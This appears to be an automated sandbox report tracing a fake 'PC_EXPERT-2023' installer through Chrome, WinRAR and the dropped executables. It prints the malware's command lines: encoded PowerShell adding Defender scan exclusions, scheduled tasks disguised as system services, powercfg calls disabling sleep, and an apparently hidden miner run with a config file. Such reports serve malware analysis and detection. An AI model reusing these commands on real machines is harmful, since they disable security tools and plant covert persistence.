C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5276 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5572 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5728 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1452 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3732 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2452 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3680 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5864 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3376 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5924 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1368 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6076 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5488 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5968 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\PC_EXPERT-2023.rar"2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2168 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4776 /prefetch:82⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3781⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\PC_EXPERT-2023\File-Set-Up_PC.exe"C:\Users\Admin\Desktop\PC_EXPERT-2023\File-Set-Up_PC.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\4w6x1TqK.exe"C:\Users\Admin\AppData\Roaming\4w6x1TqK.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAGQAMQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwBRACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEsAdQBRAEYAbwBIAE8AagBqAHYASgBGACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADAAegBMAGoAeQAjAD4A"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGQAMQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcwBRACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEsAdQBRAEYAbwBIAE8AagBqAHYASgBGACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADAAegBMAGoAeQAjAD4A"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Dllhost\dllhost.exe"C:\ProgramData\Dllhost\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json5⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo ШюYьбгЩoF7mЧw1Чtc & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo JbaлZFцуЪцD4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo BЯх5ЧfEдbЮ7 & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 8сj64pPм44⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo Р & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ПuQtCBмN4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo яGvTт8ЛЖUхKгнuиve & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo т4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo нpq & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo KuфГ2Дnьл2НkцыА & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЮпБytБ4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C echo Rщ & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo py4⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAEEEeAAlBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAFQQuBFYAJwRUAEoASAAvBFEAaQBOBBkEZgA/BDQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEUAHQRsAG0ARAA7BCMAPgAgAEAAKAAgADwAIwBkAEYARQBOABUEFAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAIQRGABwEcgBMBEsEOQRZAD4EUgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASAApBBYEWQBLBEMEOQRNBBsEHgQUBG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAOARyAEEEUwBBBG8AIgQ4AGMAGQRwADkEIwA+AA=="4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAEEEeAAlBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAFQQuBFYAJwRUAEoASAAvBFEAaQBOBBkEZgA/BDQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEUAHQRsAG0ARAA7BCMAPgAgAEAAKAAgADwAIwBkAEYARQBOABUEFAQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAIQRGABwEcgBMBEsEOQRZAD4EUgAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASAApBBYEWQBLBEMEOQRNBBsEHgQUBG0AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAOARyAEEEUwBBBG8AIgQ4AGMAGQRwADkEIwA+AA=="5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe  (tree level 4)
  "cmd.exe" /C echo ъЕи & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 1

C:\Windows\SysWOW64\schtasks.exe  (tree level 5)
  SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
  - Creates scheduled task(s)

Note: each of the four -EncodedCommand payloads below decodes (base64, UTF-16LE) to `Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -Force`, padded with random-text block comments; it adds a Windows Defender scan exclusion for the user profile and ProgramData.

C:\Windows\SysWOW64\cmd.exe  (tree level 4)
  "cmd.exe" /C powershell -EncodedCommand "PAAjADQESgAoBBIEQQRJAEoEMAA2BHEAQgAfBEMAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEkERABzAEkAHwQ0ABYEcQAiBEIAYgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMATARhAHoASAAnBGsAbgBYACgEIwA+ACAAQAAoACAAPAAjADwEGgRmAFQARAA3ADkEdABHACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAZBBAEdQAyBCIEIQRaADQAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAHMAJQQ7BEcEMQQrBDAANgASBEkAHQRwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjABQEZAA1BFUAQwBDBEIAMwA+BCkEIwA+AA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (tree level 5)
  powershell -EncodedCommand "PAAjADQESgAoBBIEQQRJAEoEMAA2BHEAQgAfBEMAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEkERABzAEkAHwQ0ABYEcQAiBEIAYgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMATARhAHoASAAnBGsAbgBYACgEIwA+ACAAQAAoACAAPAAjADwEGgRmAFQARAA3ADkEdABHACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAZBBAEdQAyBCIEIQRaADQAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAHMAJQQ7BEcEMQQrBDAANgASBEkAHQRwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjABQEZAA1BFUAQwBDBEIAMwA+BCkEIwA+AA=="
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe  (tree level 4)
  "cmd.exe" /C powershell -EncodedCommand "PAAjAEMEFQQrBCQERARMAC4ETQQ0BDQENAQ4BGgAbABNACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAKQRiAEAEHwQ3AFYAcQAYBHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADIEQgQbBCMAPgAgAEAAKAAgADwAIwBMAEMEYwBPBHcAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEARQQQBDcESgBwADYAGARHAE8ANgBKAC0EYQBaACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBhAC8EOQRxADQEHgQ4BEMEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMASQAaBDEAVAByAEcEVgAUBFMAQwREACMAPgA="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (tree level 5)
  powershell -EncodedCommand "PAAjAEMEFQQrBCQERARMAC4ETQQ0BDQENAQ4BGgAbABNACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAKQRiAEAEHwQ3AFYAcQAYBHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADIEQgQbBCMAPgAgAEAAKAAgADwAIwBMAEMEYwBPBHcAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGEARQQQBDcESgBwADYAGARHAE8ANgBKAC0EYQBaACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBhAC8EOQRxADQEHgQ4BEMEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMASQAaBDEAVAByAEcEVgAUBFMAQwREACMAPgA="
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe  (tree level 4)
  "cmd.exe" /C powershell -EncodedCommand "PAAjAGgASwRSACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgA8BCkEMARQABMEHgQXBBIERgRrAHgAZgBMACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAQBFQAIAQjAD4AIABAACgAIAA8ACMAUwBlACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBvAEAEawBVADcEOQR2AEsAJwRRACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBCADgAeQAeBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFQAOAAfBEsEOQRABDIEeAAQBGcAWQBVABUEdwAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (tree level 5)
  powershell -EncodedCommand "PAAjAGgASwRSACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdgA8BCkEMARQABMEHgQXBBIERgRrAHgAZgBMACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAQBFQAIAQjAD4AIABAACgAIAA8ACMAUwBlACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBvAEAEawBVADcEOQR2AEsAJwRRACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBCADgAeQAeBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFQAOAAfBEsEOQRABDIEeAAQBGcAWQBVABUEdwAjAD4A"
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe  (tree level 4)
  "cmd.exe" /C powershell -EncodedCommand "PAAjABsEGwQrBBMEJARzABkEVgAiBCUEVwBABDsEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwApBG8AYgA8BGYAdABCADIASgQbBHMAOAQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAVgBFAEUAaAATBBQEKAQwBEQEIwA+ACAAQAAoACAAPAAjAG4AZwAmBFIAUwAxBE0ATgBMBGYAVwB0AFUAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGcAawAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMANwQ3AE8AIQQ0BHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAVgBxAEwEIwRKBEwEJARvAEIASwAjAD4A"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (tree level 5)
  powershell -EncodedCommand "PAAjABsEGwQrBBMEJARzABkEVgAiBCUEVwBABDsEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwApBG8AYgA8BGYAdABCADIASgQbBHMAOAQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAVgBFAEUAaAATBBQEKAQwBEQEIwA+ACAAQAAoACAAPAAjAG4AZwAmBFIAUwAxBE0ATgBMBGYAVwB0AFUAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAGcAawAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMANwQ3AE8AIQQ0BHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAVgBxAEwEIwRKBEwEJARvAEIASwAjAD4A"
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\cmd.exe  (tree level 4)
  "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo ЮПхфxеМCYдх & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЙfЗЗЖЬ6кк83

C:\Windows\SysWOW64\powercfg.exe  (tree level 5)
  powercfg /x -hibernate-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe  (tree level 5)
  powercfg /x -hibernate-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\powercfg.exe  (tree level 5)
  powercfg /x -standby-timeout-ac 0
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\powercfg.exe  (tree level 5)
  powercfg /x -standby-timeout-dc 0
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\powercfg.exe  (tree level 5)
  powercfg /hibernate off
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\schtasks.exe  (tree level 5)
  SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
  - Creates scheduled task(s)

C:\Users\Admin\AppData\Local\Temp\8ZmsaNu9.exe  (tree level 2)
  "C:\Users\Admin\AppData\Local\Temp\8ZmsaNu9.exe"
  - Executes dropped EXE
  - Checks computer location settings

C:\Users\Admin\AppData\Roaming\ouicztmm.exe  (tree level 2)
  "C:\Users\Admin\AppData\Roaming\ouicztmm.exe"
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses

C:\Windows\SysWOW64\schtasks.exe  (tree level 3)
  "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
  - Creates scheduled task(s)

C:\Users\Admin\AppData\Roaming\DFpAnk0w.exe  (tree level 2)
  "C:\Users\Admin\AppData\Roaming\DFpAnk0w.exe"
  - Executes dropped EXE
